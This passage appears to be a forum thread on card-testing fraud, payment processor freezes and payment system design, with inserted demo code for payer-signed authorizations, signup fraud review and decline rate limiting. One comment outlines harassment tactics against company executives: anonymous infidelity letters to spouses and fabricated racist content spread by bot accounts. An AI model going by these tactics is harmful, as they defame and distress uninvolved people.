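    url = urlparse(qr)
    if url.scheme != "upi-demo" or url.netloc != "pay":
        raise ValueError("unrecognised QR payload")
    query = parse_qs(url.query)
    payee = query.get("pa", [""])[0]
    if not payee:
        raise ValueError("QR names no payee")
    amount = int(query["am"][0]) if "am" in query else None
    return {"payee": payee, "amount": amount}


def _canonical(body: dict) -> bytes:
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode()


class PayerApp:
    """Runs on the payer's phone. Its device key is registered with the bank;
    nothing the merchant sees allows the merchant to initiate a payment."""
    def __init__(self, account: str, device_key: bytes, pin: str):
        self.account, self._device_key, self._pin = account, device_key, pin

    def authorize(self, qr: str, pin: str, typed_amount: Optional[int] = None) -> dict:
        details = parse_merchant_qr(qr)
        amount = details["amount"] if details["amount"] is not None else typed_amount
        if amount is None or amount <= 0:
            raise ValueError("no amount to pay")
        if not hmac.compare_digest(pin.encode(), self._pin.encode()):
            raise PermissionError("wrong PIN")
        # One-time authorization: bound to payer, payee, amount and a fresh nonce.
        body = {"payer": self.account, "payee": details["payee"],
                "amount": amount, "nonce": secrets.token_hex(16)}
        mac = hmac.new(self._device_key, _canonical(body), hashlib.sha256).hexdigest()
        return {**body, "mac": mac}


class Bank:
    """Verifies payer-signed authorizations: an intercepted one cannot be
    altered (MAC) or submitted twice (nonce log)."""
    def __init__(self):
        self._device_keys = {}   # account -> device key
        self._used_nonces = set()
        self.balances = {}       # account -> balance

    def register(self, account: str, device_key: bytes, balance: int) -> None:
        self._device_keys[account] = device_key
        self.balances[account] = balance

    def settle(self, auth: dict) -> bool:
        body = {k: v for k, v in auth.items() if k != "mac"}
        key = self._device_keys.get(body.get("payer"))
        if key is None:
            return False
        expected = hmac.new(key, _canonical(body), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, str(auth.get("mac", ""))):
            return False                      # forged, or amount/payee tampered
        if body["nonce"] in self._used_nonces:
            return False                      # replay of a spent authorization
        if self.balances[body["payer"]] < body["amount"]:
            return False
        self._used_nonces.add(body["nonce"])
        self.balances[body["payer"]] -= body["amount"]
        self.balances[body["payee"]] = self.balances.get(body["payee"], 0) + body["amount"]
        return True


def demo() -> dict:
    """End-to-end run with constructed accounts; returns the outcomes."""
    bank, key = Bank(), secrets.token_bytes(32)
    bank.register("alice@demo", key, balance=10_000)
    app = PayerApp("alice@demo", key, pin="4821")
    qr = build_merchant_qr("chai-stall@demo", amount=2_500)
    auth = app.authorize(qr, pin="4821")
    return {
        "first": bank.settle(auth),
        "replay": bank.settle(auth),                          # same nonce again
        "inflated": bank.settle({**auth, "amount": 9_000}),   # merchant edits amount
        "alice": bank.balances["alice@demo"],
        "stall": bank.balances["chai-stall@demo"],
    }
```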
That would have been nice, but not backwards compatible with millions of POS terminals and payment processing setups out there.
One big advantage of contactless card payments as implemented in most countries is that you can seamlessly introduce it, making it look like a regular chip or even magnetic stripe transaction to the POS and everything behind it.
EMV is in a substantially better position than online credit card payments: the terminal cannot clone a card (though it sees a PIN and card number, it does not see the CVV, so it is not useful for online transactions, and the card contains private keys which are relatively hard to extract. The only remaining hole is creating a magstripe card, but these are becoming rare even in the US). The card does see and verify the transaction. The two main issues are the PIN entry onto the pad (which exposes some information, though with NFC this hole is somewhat removed), and the fact that the payment is still initiated by the terminal, with no way for the user to independently see the transaction amount before authorising the transaction (NFC on a phone can in principle fix this, though in a somewhat annoying manner: it could refuse the transaction the first time, then prompt the user, and accept the next transaction for the same amount).
This is how it works in a lot of places, including everywhere in China and parts of south east Asia. The merchant’s device displays a QR code, which you scan with your phone. The details of the transaction are shown on your screen, and you can select things like where the money should come from, sometimes discounts etc, and then tap to complete the transaction.
> You can blame the evil competitor but the real problem is that credit cards are not the right tool for payments to strangers over the internet.
Granted the entire system needs a revamp, but credit cards are one of the best tools we have to pay strangers right now. Credit card money isn’t your money being spent, and comes with a fraud guarantee. I would rather use a credit card than something linked to my money in a checking account for sketchy transactions.
Yes, it’s a hassle when the card number inevitably gets stolen, but NFC payments, etc are starting to tackle this.
One thing I’ve seen a lot is people misunderstanding credit cards. If you pay them off monthly, you usually get some kind of reward and additionally a huge layer of fraud protection from your personal finances. That being said, I also can’t wait until more secure credit card systems become more prevalent.
In much of the world, the "credit card" payment goes through a pre-paid card. Then you're actually putting your own money on the line, and even if there's a guarantee, it's a pain to actually go through the process of invoking it.
If this is one of the best tools, then I'm really dismayed at the state of payments around the world. SEPA bank transfers are so much better, even if they have other problems.
> you usually get some kind of reward
What kind of reward? I’ve always paid mine off each month and never gotten a reward on any of my ~15 cards.
My cc number is useless without access to my bank account. The hacker would also need to steal my phone and bypass the fingerprint scanner somehow to get in there.
>One thing I’ve seen a lot is people misunderstanding credit cards.
Practically all the credit card haters turn out to not understand credit cards, it's almost hilarious. Are people not taught even the very basics of financial know-how by anyone?
> Why are we still using credit cards? It’s not great as a consumer either
Because the big networks (Mastercard and Visa) as well as the issuer and acquirer banks spend insane amounts of money on advertising and lobbying - even in the EU where payment fees are capped, the cap on CC fees is notably higher than on debit card/SEPA fees, so there is a clear incentive for everyone in the chain to push for credit cards.
Additionally, issuer banks make a ton of money on interest which means they have even more of an incentive to push for CC usage.
And also this reliance on a few payment providers causes the same type of problems as this business has with Google - big businesses trampling yours on a whim, with no real recourse. The problem is actually far worse with payment processors, who are increasingly taking it upon themselves to be an unelected worldwide morality police, deciding which types of commerce shall be legal with their own de facto law.
Is it? My bank accounts in two European countries have in the last year transitioned from Visa Credit cards to Visa Debit cards. Because the banks in both cases wanted about 2.5 euro per month for something that does not provide any value to me. Unfortunately Visa Secure seems to be changing its validation mechanism every 3 months though, which each time is super annoying.
CCs in Europe require a 2FA confirmation where you usually receive a notice of the amount you're approving.
This is not mandatory by law though and mostly it's up to the merchant to decide whether they require 2FA or not. AFAIK payment processors like Stripe actually let you make 3DS (and whatever it's called for MasterCard / AMEX) mandatory.
I guess the problem is that in the US you'll lose a lot of customers by declining payments without 2FA. Also the likes of AMEX use 2FA via email so I guess there could be fraud too.
> CCs in Europe require a 2FA confirmation where you usually receive a notice of the amount you're approving.
How does that work when you buy things in places where you don't have cell service?
Yes, they exist. Even in Europe.
We’re still using credit cards because they severely limit personal liability. Many CC companies give you the ability to have temporary cards with short term expiration linked to your account. However, there are minimal incentives for you to do so.
The credit card company and indirectly the vendors carry much of the cost of fraud. The credit card company spends a lot of resources on preventing this fraud. Introducing a proper solution for online payments would allow them to reduce costs and offer better deals to vendors and consumers. They also are the only participant in this who is an individual participant rather than a group. It seems like this is the ideal setup for credit card companies to introduce innovative solutions. They have the incentive and the leverage, yet it's not happening. What am I missing?
Strong authentication/payment confirmation and strong consumer liability protection are not mutually exclusive.
In the EU, card issuers and merchants are required to use 3DS for e-commerce payments and PIN verification for in-person payments in many circumstances; yet chargebacks are still possible.
We use CC because the infrastructure is there and there is legally mandated (depending on jurisdiction) fraud protection. When you pay with CC, the issuer is potentially on the hook for fraudulent payments, so they are incentivized to provide the protections.
And of course there are many that use CCs for the purpose of a loan to purchase items they can’t currently afford.
Although you're right that Apple Pay is cryptographically verified, you may be surprised to know these two things:
1. you can charge any amount - the amount shown in the Apple Pay UI is arbitrary
2. you can make multiple charges, also of any amount (e.g. for a subscription)
It is tokenized, but practically it's just a card number you can charge like any other card number. It's also typically linked back to the original PAN, so multiple payments can be correlated together with ease.
Your payment processor and the network has to trust you if you're reusing the Apple Pay cryptogram for a subscription payment. You _can_ do anything (e.g. you can represent yourself as an open loop transit network reader and get a card number without any authentication from express mode cards!), but the network will not allow you to succeed doing that for very long, if at all.
> Why are we still using credit cards?
Because they're accepted by pretty much everybody and nobody has come up with a system that is any better.
A multi-cryptocurrency payment system would be the perfect solution for online payments but unfortunately nobody has figured out how to solve the double-bullet problem which stands in the way of mass adoption.
Central banks are preparing to launch the digital euro and the digital dollar. Cryptos had their chance and they blew it.
No, it's really not. As a buyer I don't want irreversible transactions to someone anywhere in the world, I want something that if the seller isn't acting fairly (items not as described, not shipping orders, etc) I can lean on to get my money back.
That's why 3D secure exists: https://en.wikipedia.org/wiki/3-D_Secure
Blame your government for not caring enough to have it implemented
I hate 3D Secure, it's a way for banks to move the liability and inconvenience to me, their customer. In most implementations, I need to wait for an SMS, and often that SMS takes ages to come.
Then there's a bit of a monopoly with 3d secure implementation by cardinal.js and their solution falls down completely if you have a decent amount of traffic on the site (I have worked on flash sales websites, cardinal js is about as reliable as I can throw my car)
Blaming certain government can get you banned not only from facebook but from real life altogether.
No information is given about the actual activities ongoing here so I’ll focus on the service provider's behaviour directly.
Given the meteoric rise of companies charging for services with no support of any type available for consumers other than hoping for traction on social media, how do we legislate to basically enforce some alternative to ‘computer says no, just make a new account and hope it doesn't happen again’? This seems like something consumer protection agencies should be all over.
Australia’s consumer protection body is actually quite active in enforcing our rights when dealing with these sorts of things. Does America not have a similar agency or has it been captured by the companies it’s supposed to regulate?
These companies are collecting sizeable profits and part of the way they’re achieving this is by simply disregarding all the support and engagement processes ‘normal’ businesses have to have claiming their scale makes them impossible. That should just not be an acceptable answer as far as consumer remedies are concerned.
Payment processors are a natural monopoly and as such they should be regulated like utilities, i.e. not allowed to deny service without good reason. Unfortunately the government rather likes having a way to destroy the livelihoods of undesirables without any of that pesky due process.
The payment networks (Visa/MC/etc.) may be monopolies but there are a ton of processors (Stripe/PayPal/etc.). Sure, all the smaller processors "suck" but somehow they worked before Stripe was founded.
You have hundreds of choices to take credit cards online. You can just go the traditional method and get a merchant account and payment gateway.
Payment processors are not a natural monopoly, especially not online ones
We need some new snappy word to describe what service providers are doing.
I know you could probably say that it's just some other existing legal construct which we should just enforce, but the point is that the media needs some snappy new very specific word to talk about to make politicians pay attention.
Things like swatting, phishing, slamming, gaslighting and boofing we all know about and are easy to write articles on with decent enough SEO.
So what is the snappy new 21st century term for this, so that we can complain about it and write blogs and articles about it and demand politicians do something about it?
Every business wishes it could be a vending machine. Strip out all employees and customer service and damn the consequences if your soda gets stuck.
Too many people and businesses have been relying on these vending machines, partially because they have no other choice. Everything has been hollowed out, every store runs on a skeleton crew. You know this if you’ve walked around a store wondering if anyone even works there. I never noticed this until I traveled to other countries and found businesses that actually felt like they wanted to please me instead of feeling like I was expected to be grateful that BigBoxStore (tm) exists.
"Deaf corporations" since they cannot hear, "Divine corporations" since they won't listen to you, "Nosumers" as the opposite of prosumers and a nice play with no-sum (you heard it first here)
Some more brainstorming:
===
"Support Void", "Voiding", "Customer Voiding"
Tossing all customer support requests (and sometimes customers themselves!) into the void.
Pros: Sounds snappy and dramatic. Has humorous resonance with voiding your bowels.
Cons: Meaning not immediately clear. Sounds active when the problem is really more passive.
===
"Customer Neglect", "Customer Disservice", "Customer Ghosting"
Opposite of "customer service."
Pros: Meaning is more obvious because of its relation to Customer Service.
Cons: Not quite as snappy.
Kafkaesque
> Does America not have a similar agency
It does, but it's still newish, and faces a lot of opposition from both politicians and businesses.
In 20 or 30 years, once the various lawsuits and codes get sorted out, it might work. But it's still in its toddler phase, and everyone is seeing if they can push the baby over.
The Federal Trade Commission seems relevant. I've not tested them on these "no support; no recourse" situations, but have had good results for other issues.
Anybody thinking of the "Better Business Bureau" should note that the BBB is not a government organisation and behaves more like a Better Extortion Bureau: paying members can keep their good rating by unilaterally declaring a claim has been resolved (often requiring claims to be reasserted multiple times), while non-members or non-paying members cannot even contest claims via the bureau.
We also have an issue of enforcement, I'm not sure if you know... but many, if not all of these behaviors could be acted on with existing legislation. Anti-trust at the federal level and a multitude of state laws on paper make it illegal to do this type of behavior.
The problem is that it's really hard to take action on large corporations. As a consumer, if I wanted to seek remedy for say, false advertising of ingress protection on a phone, it would cost hundreds of thousands of dollars in legal fees. Without a significant war chest it's almost impossible to hold most companies to account as an individual, and the agencies supposed to be enforcing these issues either won't or can't enforce the laws on the books.
The Aussie government has the same new account cycling that corporate culture does. It's just that the gov has call centres and support staff.
Do you think there's any incentive to fix these problems when the constant inconvenience and technical gremlins can be more easily and excitingly solved with biometric IDs and whatever else?
Let's be honest, the Australian government may clamp down on corporations, but it plays the same game and doesn't care for anyone's dissent in the long run.
Not sure if anyone has experimented with this but I wonder if there is a solution but it's just relatively unused. I've heard suing the company (or in most cases, taking them to arbitration) works and often times the company is the one paying for the fees (because that's how arbitration works).
The claim that scale makes support impossible is ridiculous. Just make support a paid service and it'll easily pay for itself and scale proportionally. The will is simply not there.
If you are being unethical there are a bunch of things you can do.
I would advise targeting people directly, anonymous letters directed to a spouse with accusations of cheating will help prevent executives from travelling and add a lot of personal stress on their lives, all it costs is a stamp. -- this is especially easy if you live in Sweden; since addresses and living arrangements are public info.
Other things you can do is to fabricate something racist and pay for a few hundred bot accounts to follow any mention of the company or product.
I have had both of these happen to me, and my industry is not very competitive nor am I a famous figure.
I'm sorry to hear that happened to you. :( Sounds horrible.
I hope this attack becomes more popular. I truly do.
Maybe these attacks will finally force regulators to do something about the financial parasites we call "payment processors". Any payment processing system that doesn't act like a public utility is broken and needs fixing.
I think the only digital payment system that comes close to acting like a utility right now is cryptocurrency, which is a sad, sad state of affairs.
OP: While not a complete solution, you might be able to partially mitigate this by allowing customers to pay you in other forms (e.g. the aforementioned cryptocurrency, bank transfers). That's what the porn industry and other legal businesses end up doing when they inevitably find themselves in your position.
If your customers want your product badly enough, a small fraction of them will learn how to use these payment methods. You'll have to learn to survive on those alone.
Pix, the Brazilian payment system, is basically a utility, and payers authorize the payment rather than the payee. It has very little friction, everyone uses it. It does require working internet.
I feel that Algorand (I'm not a holder anymore) was positioned to work as such but would require all the parts to make it successful. The 0.001 ALGO transaction fee cuts down on silly transactions while making 0.1 ALGO transactions possible. It also allows trading in stablecoins or CBDCs as they are enabled. It can complete transactions in milliseconds and moderately-sized participants can easily help maintain the whole network. It never gained traction, however, probably because it isn't a good HODL.
Why is it sad? I truly don’t get it, people on HN will say they are somewhat libertarian, pro decentralization, anti corporate oligopolies, but then use their dying breath to say “crypto has no use case”. Yet while AI took nearly 70 years to find its footing, in just 10 years crypto (currencies) has already found inroads into many areas as a nascent technology that has massive potential to solve some of our biggest problems.
I truly think it’s one of those cases where the “wrong/dumb” people jumped onto it (alongside scammers) and so it became poisoned to the right/smart ones. But we should be way better than that! Is it really so hard for people to separate good from bad?
It absolutely bowls me over to see this lack of ability to discuss it carefully around here so consistently. So many potential amazing conversations totally shunted by the absolute need to turn it tribal.
> Is it really so hard for people to separate good from bad?
If you mean "HN people", then probably no; but if you mean more generalized "people", then definitely yes. Unfortunately, your customers are much more likely from the latter group.
Also, being in a sad state doesn't really mean it "has no use case", right?
As someone who worked in France for a medium-ish size media agency, we had something similar happen to our Google AdWords account... and it took ~2 weeks for our legal studio to get it back with direct support from Google.
Afaik it mostly took them basically writing a few legal letters and telling them "our legal representatives would be glad to meet you at your offices at Google France and discuss such unfortunate issue and so and so" - they basically went "how about no" and restored the account.
Lawyer fees weren't particularly cheap (in the range of 2500-5000€) but still well below the money we were losing.
Is this not an option for US-based businesses? I have heard similar horror stories like the one on the OP a few times already but I've rarely seen them pursue a similar path.
>Is this not an option for US-based businesses?
It is absolutely an option. Some people simply choose not to pursue it for many reasons ranging from financial, to a matter of principle, effort required, or any other number of reasons.
It is an option.
You'll notice those stories rarely include "and I talked to my lawyer"
> 10 year relationship with Paypal and 7 year relationship with stripe
Not that the author is implying this, but don’t ever make the mistake of thinking that these numbers ever matter. It’s not 1973 and you don’t shake hands with your banker.
The only number that matters is the number of dollars going through Stripe or PayPal because of your business.
Further, the $500k number is absolutely nothing that stripe cares about. They only take a fraction of
Been there. It might be competitors. It might just be fraudsters looking to see what they can get for free from that otherwise useless stash of credit card numbers they stole or got on some forum from someone who did. Once your marketing hits the radar of one of these crews they will pass your service on to each other. As a merchant you need to develop your own fraud screening techniques or pay someone to do it.
(Pardon me if I am projecting from my past startup experience to yours in all my comments.)
I am not blaming the victim. But the industry is set up so the merchant is most responsible for detecting and dealing with fraud. And that is probably objectively not a bad call. You have all kinds of ways to detect who is doing this and ways to stop this. I hate this crime with a passion and cut it down from 5000/mo to 50/month at my first startup when it blew up on us. But it is true the credit card middlemen, having externalized the risk to you, don't then innovate incremental tools for merchants that well. I was frustrated when I received fraudulent requests that there was no third party I could report my suspicions of fraud to with a confidence rating (or check against other merchants' suspicions). I did many years later see a service like that but now can't find it.
I did just now find a pretty good list of merchant anti fraud tactics which had tricks nobody told me at the time but I had to figure out myself and were pretty successful: https://support.authorize.net/knowledgebase/Knowledgearticle...
Good luck. These guys are persistent. In my case most of them were coming from poor countries where a dollar of fraud is worth a lot more of their time than yours. Until you stop them cold, they will keep coming.
What was your most successful defence to these attacks?
No OP, but I had it happen to me and adding a "3DS" card verification to the checkout flow made the problem go away. The 3DS step is where they text the customer a number they have to type in to proceed.
It's a pain for the customer so I only do it on newish accounts, repeat customers don't get bothered.
This was LONG ago so some context is less relevant now and may not apply to others, but three of a dozen of our tactics turned the tide, the last being the best, but building on the others:
1) The basics: track all information entered in the signup process and display it in a signup email to our customer service/onboarding rep, along with whether and how often each piece of info was used (or was similar) in past locked/disabled-for-fraud accounts, and have a human determine via eyeball if the composite picture looked like fraud. You'll be surprised how often a customer saying his name was Ibrahim with a phone number in Egypt had an IP in Jordan and was using a credit card belonging to Sally Jones with a zip code in Kansas. Don't automate fraud decisions. Have a human in the loop. Know your customers with a human touch up front at signup. ("Do things that don't scale" is the more recent mantra for this approach.) But never emit info that would let fraudsters game the system beyond the binary of getting enabled/disabled, and even then don't give them immediate feedback during/post signup to run permutations quickly. Have a human vet asynchronously shortly post-signup as part of the customer welcome/orientation call.
2) Silently partially disable international customers so they could sign up and give us info and do certain things but not really generate expensive transactions until a customer rep called and welcomed/vetted them and checked a box unrestricting them in our admin panel. (I say silently but if they actually got to the final step of a transaction, we did give them ways to reach out to us to get activated after talking to someone (which was manned 24x7). 99+% of the time, fraudsters never called/reached out.)
3) Most subtly, reps, especially offshore ones from white label partners of ours, were slow to use our ways to vet their (and thus our) customers even though their management was pushing our development team for more and more technical solutions to cut fraud. It was frustrating because I could see the fraud and it was a massive chunk of our partner's revenue (1/3rd?) shortly out of the gate with us, but since they were a white label customer of ours I/we couldn't exactly tell their lower level rep employees to get off their butts and take the fraud seriously (when even their management wasn't getting through), nor did I want it to continue to harm their business because it would also harm ours.
Remembering the mantra “you can’t manage what you don’t measure”, I built an admin screen that their reps (and thus their bosses) could see that showed when each recent customer signed up and when they were cleared or locked out as fraud, how many minutes were between the two and who (which rep) locked/cleared the customer and how much was spent (lost) before the account was locked. The difference was profound. Fraud from the white label partner’s customers dropped practically overnight, from $5000 a month to under $50 just by adding a report that quietly made the humans in the loop accountable. I didn’t even have to tell the partner’s people what to do. I just made the outcomes measurable and visible and the problem took care of itself. It was a profound lesson for me early in my career. I wish that exact trick had been more useful for me since, but still — very eye opening. Chargebacks were never a problem for us again.
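The "composite picture" review from tactic 1 above, as an added example that is not the commenter's code: it gathers the signup signals (phone country, IP country, card billing zip, cardholder name), checks each against a history of signals seen on accounts later locked for fraud, and hands the result to a human rather than deciding itself. The geolocation tables, past-fraud history and sample signups are all constructed.

```python
"""Composite signup review for a human reviewer (added example, constructed data)."""
from collections import Counter
from dataclasses import dataclass, field

# Constructed lookup tables standing in for phone-prefix and IP geolocation services.
PHONE_PREFIX_COUNTRY = {"+20": "EG", "+1": "US", "+962": "JO"}
IP_PREFIX_COUNTRY = {"197.10.": "EG", "79.173.": "JO", "68.32.": "US"}
ZIP_PREFIX_COUNTRY = {"66": "US", "67": "US"}  # constructed Kansas zip prefixes

# Constructed history: how often each signal appeared on accounts locked for fraud.
PAST_FRAUD_SIGNALS = Counter({
    ("phone", "+20-100-555-0100"): 3,
    ("ip", "197.10.4.22"): 2,
    ("card_name", "Sally Jones"): 1,
})

@dataclass
class Signup:
    name: str
    phone: str
    ip: str
    card_name: str
    card_zip: str

@dataclass
class Review:
    mismatches: list = field(default_factory=list)   # human-readable inconsistencies
    prior_fraud_hits: dict = field(default_factory=dict)  # signal -> past fraud count

def _country_of(prefix_table, value):
    for prefix, cc in prefix_table.items():
        if value.startswith(prefix):
            return cc
    return "??"

def review_signup(s: Signup) -> Review:
    """Build the composite picture; it never enables or disables the account itself."""
    r = Review()
    phone_cc = _country_of(PHONE_PREFIX_COUNTRY, s.phone)
    ip_cc = _country_of(IP_PREFIX_COUNTRY, s.ip)
    zip_cc = _country_of(ZIP_PREFIX_COUNTRY, s.card_zip)
    if phone_cc != ip_cc:
        r.mismatches.append(f"phone country {phone_cc} != IP country {ip_cc}")
    if zip_cc != ip_cc:
        r.mismatches.append(f"card zip country {zip_cc} != IP country {ip_cc}")
    if s.name.split()[-1].lower() != s.card_name.split()[-1].lower():
        r.mismatches.append("signup surname differs from cardholder surname")
    # Overlap with signals from previously locked accounts, per tactic 1.
    for kind, value in (("phone", s.phone), ("ip", s.ip), ("card_name", s.card_name)):
        hits = PAST_FRAUD_SIGNALS.get((kind, value), 0)
        if hits:
            r.prior_fraud_hits[kind] = hits
    return r
```

The Review object is what would go into the rep's signup email; the shopper sees nothing from it, which keeps the feedback loop the commenter warns about closed.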
I’ve heard that a lot of Shopify sites will have the auto credit card processing disabled for new orders. So that a real person can validate the order before hitting Stripe or whoever with it. Fraud orders are usually easy to spot by shipping addresses and you can get a good sense for it pretty quickly. It isn’t quite chicken sexing!
Maybe the hot take here is that the best way to ruin your own business is to automate credit cards?
"Fraud orders are usually easy to spot by shipping addresses"
You can find some of these by searching the shipping address and seeing if it's a freight forwarder or an obviously vacant home (listed on MLS with empty room pictures). Those kinds of shipping addresses have a pretty high fraud rates.
But, if you mean seeing that the shipping address doesn't match the billing address on the card via AVS... That's trickier, especially for B2B spaces where a business owner buys with a credit card tied to their home address, but ships to their business.
> You can find some of these by searching the shipping address and seeing if it's a freight forwarder
Am a legitimate user of a freight forwarder, this attitude makes me sad.
I would assume the payment provider should handle those analytics, not the vendor
Or maybe these processors should train an AI to find whatever pattern you are describing.
That's sort of the problem - Payment processors know that fraud is occurring, and they punish the business owner.
This is a cool blog. Just super short ideas as a blog post that be read in under a minute. Thanks for sharing!
After reading your comment, I went back to the website and checked out myself. You're right; thanks for pointing it out.
Like tweeting without Twitter.
Everything is better without Twitter! ;-)
Here’s a question, if Stripe or PayPal for example are processing so many transactions why can’t they see this stuff coming a mile away?
Shouldn’t it be trivial to “triangulate” the origin of a card hack / leak after like, I don’t know, three or four transactions? This whole thing seems rigged to make small businesses liable for covering the cost of the PII failure of probably a banking institution, or at minimum a completely different small business!
Reading so many of the comments in this thread just strengthens my belief that we need large platforms to be governed like utilities, or even better, open source alternative based utilities
I know it's probably downvoted as society has a sweet spot for pity, but to a certain extent it's OP's fault.
As a merchant, you need to have a proper anti-fraud system. Especially considering the influx of orders with stolen CC. It's just necessary to avoid huge financial and reputational losses.
Don't rely on Shopify/Stripe "anti-fraud" - it's absolute garbage selling a feeling of security. Proper analysis of order flow with spotting irregularities across many datapoints is needed.
Some may whine things are not fair - yes they are not, and never will be. You just need to adapt.
Let me guess, you think cloudflare is the devil, right?
This is happening because you are basically leaving your PoS system open and unattended while a scammer walks by with a wheelbarrow full of freshly stolen credit cards.
Throw a captcha on that checkout page at least for goodness sakes
Sidenote, I remember some people here wondering why websites don't explain why a transaction failed (wrong CVV, wrong AVS or Do not honor, etc...). This is what happens if you do give this kind of error through, don't put some form of rate limiting, etc.. It becomes a convenient site for scammers to test stolen credit cards and you end up being flagged by your payment provider.
Also, it's worth having a relationship with a smaller payment gateway, merchant account provider. It insulates you somewhat.
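The two controls the sidenote above calls for, as an added example (not the commenter's code): the shopper gets one generic decline message while the processor's precise reason stays in a server-side log, and a sliding-window counter of declines and distinct cards per client pauses checkout for card-testing bursts. Client keys, card fingerprints and reason strings are constructed stand-ins; a real deployment would use the processor's card token, never the PAN.

```python
"""Generic decline messaging plus card-testing rate limit (added example, constructed data)."""
from collections import defaultdict, deque

GENERIC_MESSAGE = "Your payment could not be processed. Please try another payment method."
WINDOW_SECONDS = 600    # sliding window over which declines are counted
MAX_DECLINES = 3        # declines per client in the window before checkout pauses
MAX_DISTINCT_CARDS = 2  # distinct declined cards per client before checkout pauses

class DeclineGuard:
    def __init__(self, window=WINDOW_SECONDS, max_declines=MAX_DECLINES,
                 max_cards=MAX_DISTINCT_CARDS):
        self.window, self.max_declines, self.max_cards = window, max_declines, max_cards
        self._history = defaultdict(deque)  # client_key -> deque of (ts, card_fingerprint)
        self.internal_log = []              # precise processor reasons, server-side only

    def _prune(self, client_key, now):
        q = self._history[client_key]
        while q and now - q[0][0] > self.window:
            q.popleft()

    def _distinct_cards(self, client_key):
        return len({fp for _, fp in self._history[client_key]})

    def handle_decline(self, client_key, card_fingerprint, processor_reason, now):
        """Record a decline; return (message_for_shopper, allow_retry).

        processor_reason (e.g. a constructed 'cvv_mismatch') is logged but never shown,
        so the checkout does not reveal which check failed.
        """
        self.internal_log.append((now, client_key, card_fingerprint, processor_reason))
        self._history[client_key].append((now, card_fingerprint))
        self._prune(client_key, now)
        too_many = len(self._history[client_key]) >= self.max_declines
        many_cards = self._distinct_cards(client_key) >= self.max_cards
        return GENERIC_MESSAGE, not (too_many or many_cards)

    def is_card_testing(self, client_key, now):
        """True when one client has cycled through several distinct declined cards."""
        self._prune(client_key, now)
        return self._distinct_cards(client_key) >= self.max_cards
```

A legitimate shopper retrying the same card stays under the distinct-card threshold, while a run of different declined cards from one client is paused after the second.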
I wonder if something like Paddle, LemonSqueezy will protect you in this case.
They are the merchant in that scenario and process refunds / chargebacks. Most likely they will punish you in some way though.
Use a service like Sift, or better, ask your CC processor for 3D-Secure if possible.
I am unable to log in to my paypal account, because the confirmation sms never arrives, and the only contact given is to call them. Guess I’ll never use paypal again.
I just wish there was adversarial integration on these payment apps. I'm tired of setting up new ones.
Imagine if our phones still worked like they originally did, where you could only call other people using the carrier you are on. Oh you have T-mobile? Sorry. I have AT&T, I will write you a letter.
We didn't put up with it back then, and we shouldn't put up with it now.
I’m not a crypto evangelist by any means but one thing that I like about crypto is there are no charge backs. I added coinbase and it’s not a huge amount but about 5% of sales go over this. Apple/meta/amazon pay are also somewhat alternatives because the payment is going through a device that can be physically stolen but harder to do fraud with than a virtual credit card.
> one thing that I like about crypto is there are no charge backs.
Most consumers probably don't like that at all, though.
I view it as paying by cash, so the same type of pitfalls exist. I'm not really pushing crypto as the best payment method, just giving the OP possible alternative payment methods they could use. There is a learning curve to using crypto, which I believe reduces the potential of consumers not fully understanding the risk of sending payments. Consumers who want the protections should use a credit card to get those.
Coinbase could freeze your ability to process or receive your payments for a dozen random reasons too. False sense of security there, you need self custody.
Have open source self custody merchant tools improved?
Brick and mortar gone online and Web 2.0 services seem pretty left behind for accepting crypto payment. And Web 3’s crypto natives don't care or need purchasing flows.
DAO has entered the chat.
> Big corporations with billions in profits without any real support staff….
No support staff is probably how they scaled up to billions in profits in the first place.
This is something I could see CA, NY, or the EU taking on someday with some sort of "right to digital recourse" law.
I wonder what it is that we do differently such that I never hear of these problems from natively European payment methods. E.g. the payment platform iDeal draws directly from your bank account but there is apparently no significant trade in stolen logins. What makes that not as lucrative?
Related, but not strictly the same: a week ago my IBAN (eu-wide bank account number) was used via a Paypal guest account to make payments of 580€, paying through direct debit (Lastschrift).
There is no inherent security at all. Merchants usually send you 1 cent with a 2fa code, in order to verify that you have access to the account. In my case this was not done apparently, and the scammers got their items. I was able to do something similar to a charge back, but I wonder whether the online store or PayPal will have to eat the loss.
I read about stuff like this every month, but then people (on the internet) tell me there are no uses for blockchains and they're exclusively for scams (yes, scams exist, a lot of them).
Try talking to a local (office close-ish to you) processor or acquirer. You usually need a good amount of transactions to get them interested, but they will have support, they will discuss before taking any measures etc.
Good tip, but it doesn’t even have to be a B2B attack. A sufficiently pissed off customer can order such an attack on a business that wronged them.
Or perhaps it is spammer who didn't like being played with theoretically by the author?
https://oppositeinvictus.com/how-to-mess-with-spammers-for-s...
Soon KYC in every ecommerce will be standard.
In many countries you have a cheap, easy to implement and fast bank to bank for online which is faster, cheaper and more secure. And as such, mostly impossible to chargeback because unless you had a gun to your head, it was you who did the transaction.
In those regions, incentivise those means; give 5% discount for paying like that. We accept those in region where they are available, we also have our IBAN for you to pay directly. Some companies prefer that as they pay all their other invoices that way.
It would be relatively easy to implement in Ireland, but I've only used it once (buying from a shop in Germany). I placed the order on their website, and they gave me an IBAN and a reference number. I did a bank transfer to that account using the reference number they gave me, and they marked the invoice as paid and shipped the product. Simple system, though I'm not sure how they monitored their bank account: it may have been manual. It would work for any company which uses IBANs, which is all SEPA companies and many more besides.
Australia has a system called POLi. This injects a popup into the checkout page of a website which allows you to log into your own bank and do a transfer from there. That works well, and seems quick and easy for the customer.
No need to. Just force card processor to implement 3D-Secure by default.
Use Mollie, they have great customer support.
Are there no alternative payment gateways?
> as a solo SaaS builder it seems harder and harder these days to have any sort of job security
This overlooks the hard work and risk undertaken by the virtuous founders of Paypal and Stripe.
*SBOs love to advocate the virtues of "risk-taking" to defend exploiting others, and the opposite when they find themselves at the other end of the exploitation.